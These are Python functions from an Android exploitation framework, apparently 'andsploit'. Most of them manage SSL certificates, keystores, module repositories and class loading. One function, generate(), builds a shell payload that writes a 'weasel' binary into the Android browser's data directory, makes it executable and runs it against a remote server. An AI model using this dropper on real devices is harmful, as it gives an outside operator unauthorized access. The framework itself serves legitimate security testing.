def trust(self, certificate, peer): """ Add the certificate to the SSL Known Hosts in the Configuration file, so we will always trust this host in future. """ Configuration.set("ssl-known-hosts", "%s|%d" % peer, self.digest(certificate))
def __load_variables(self): """ Load extra variables, specified in the .andsploit_config file. """ for key in Configuration.get_all_keys("vars"): self.variables[key] = Configuration.get("vars", key)
def enable(cls, path): """ Re-add a andsploit Module Repository to the collection, that was created manually or has previously been removed with #disable(). """ if cls.looks_like_repo(path): Configuration.set('repositories', path, path) else: raise UnknownRepository(path)
def disable(cls, path): """ Remove a andsploit Module Repository from the collection, but leave the file system intact. """ if cls.is_repo(path): Configuration.delete('repositories', path) else: raise UnknownRepository(path)
def delete(cls, url): """ Removes a andsploit remote, with the specified URL. """ if cls.get(url) != None: Configuration.delete('remotes', url) return True else: raise UnknownRemote(url)
def all(cls): """ Returns all known andsploit remotes. If the [remotes] section does not exist in the configuration file, we create it and add a default repository. """ if not Configuration.has_section('remotes'): cls.create("https://raw.github.com/mwrlabs/andsploit-modules/repository/") return Configuration.get_all_values('remotes')
def create(cls, url): """ Create a new andsploit remote, with the specified URL. If the URL already exists, no remote will be created. """ if cls.get(url) == None: Configuration.set('remotes', url, url) return True else: return False
def provision(self, path): """ Provision new CA Key Material. This will overwrite any existing CA. """ self.authority.create_ca() Configuration.set("ssl", "ca_path", path) fs.write(self.ca_certificate_path(), ca.CA.certificate_to_pem(self.authority.ca_cert)) fs.write(self.__ca_key_path(), ca.CA.pkey_to_pem(self.authority.ca_key)) return True
def make_jks_trust_store(self): """ Prepare a JKS TrustStore, for the CA. """ keytool = Configuration.executable("keytool") argv = [ keytool, "-import", "-trustcacerts", "-noprompt", "-alias", "andsploitCA", "-file", self.ca_certificate_path(), "-keystore", self.__jks_path("andsploit-ca"), "-storetype", "JKS", "-storepass", "andsploit", ] if keytool != None: if os.spawnve(os.P_WAIT, argv[0], argv, os.environ) == 0: return self.__bks_path("andsploit-ca") else: argv[0] = "keytool" print "Could not compile the JKS trust store, because keytool could not be located on your system." print "Run:" print " ".join(argv) return False
def loadClass(self, source, klass, relative_to=None): """ Load a Class from a local apk file (source) on the running Dalvik VM. """ if relative_to == None: relative_to = os.path.join(os.path.dirname(__file__), "..") elif relative_to.find(".py") >= 0 or relative_to.find(".pyc") >= 0: relative_to = os.path.dirname(relative_to) if not Module.cached_klass(".".join([source, klass])): loader = utils.ClassLoader(source, self.__get_cache_path(), self.__get_constructor(), self.klass('java.lang.ClassLoader').getSystemClassLoader(), relative_to=relative_to) loader.android_path = Configuration.library("android.jar") loader.dx_path = Configuration.executable("dx") loader.javac_path = Configuration.executable("javac") Module.cache_klass(".".join([source, klass]), loader.loadClass(klass)) return Module.get_cached_klass(".".join([source, klass]))
def get(cls, url): """ Get an instance of Remote, initialised with the remote settings. """ url = Configuration.get('remotes', url) if url != None: return cls(url) else: return None
def ca_path(self, skip_default=False): """ Get the path to the CA Key Material, as defined by the configuration file. """ ca_path = Configuration.get("ssl", "ca_path") if ca_path == None and skip_default == False: ca_path = os.path.join(os.path.dirname(__file__), "embedded_ca") return ca_path
def generate(self, arguments): self.format = "R" # we only support RAW format architecture = "armeabi" if arguments.working_directory != None: directory = arguments.working_directory elif self.__exploit != None: directory = self.__exploit.working_directory else: directory = "/data/data/com.android.browser" weasel = Configuration.library(os.path.join("weasel", architecture)) self.append(self.hexifyString("cd %s\n" % directory)) self.append(self.hexifyString("/system/bin/rm w\n")) self.append(self.hexifyString("echo -e \"%s\" > w\n" % "".join(map(lambda b: "\\0%.3o" % ord(b), fs.read(weasel))))) self.append(self.hexifyString("/system/bin/chmod 770 w\n")) self.append(self.hexifyString("./w %s %d\n" % arguments.server))
def make_bks_key_store(self, cn, p12_path, export_password, store_password, key_password): """ Prepare a BouncyCastle KeyStore from a PKCS12 bundle. """ keytool = Configuration.executable("keytool") argv = [ keytool, "-importkeystore", "-deststorepass", store_password, "-destkeypass", key_password, "-destkeystore", self.__bks_path(cn), "-deststoretype", "BKS", "-provider", "org.bouncycastle.jce.provider.BouncyCastleProvider", "-providerpath", os.path.abspath(os.path.join(os.path.dirname(__file__), "bcprov-ext-jdk15on-1.46.jar")), "-srckeystore", p12_path, "-srcstoretype", "PKCS12", "-srcstorepass", export_password, "-alias", "andsploit", ] if keytool != None: if os.spawnve(os.P_WAIT, argv[0], argv, os.environ) == 0: return self.__bks_path(cn) else: argv[0] = "keytool" print "Could not compile the BKS keystore, because keytool could not be located on your system." print "Run:" print " ".join(argv) return False
def make_bks_trust_store(self): """ Prepare a BouncyCastle TrustStore, for the CA. """ keytool = Configuration.executable("keytool") argv = [ keytool, "-import", "-trustcacerts", "-noprompt", "-alias", "andsploitCA", "-file", self.ca_certificate_path(), "-keystore", self.__bks_path("andsploit-ca"), "-storetype", "BKS", "-storepass", "andsploit", "-provider", "org.bouncycastle.jce.provider.BouncyCastleProvider", "-providerpath", os.path.abspath(os.path.join(os.path.dirname(__file__), "bcprov-ext-jdk15on-1.46.jar")), ] if keytool != None: if os.spawnve(os.P_WAIT, argv[0], argv, os.environ) == 0: return self.__bks_path("andsploit-ca") else: argv[0] = "keytool" print "Could not compile the BKS trust store, because keytool could not be located on your system." print "Run:" print " ".join(argv) return False
def all(cls): """ Returns all known andsploit Repositories. """ return Configuration.get_all_values('repositories')
def trusted_certificate_for(self, peer): """ Fetches the trusted certificate for a peer. """ return Configuration.get("ssl-known-hosts", "%s|%d" % peer)
def unpack(self, name): if self._execute([self.__java, "-jar", self.__apk_tool, "-q", "decode", Configuration.library(name + ".apk"), self.source_dir()]) != 0: raise RuntimeError("could not unpack " + name)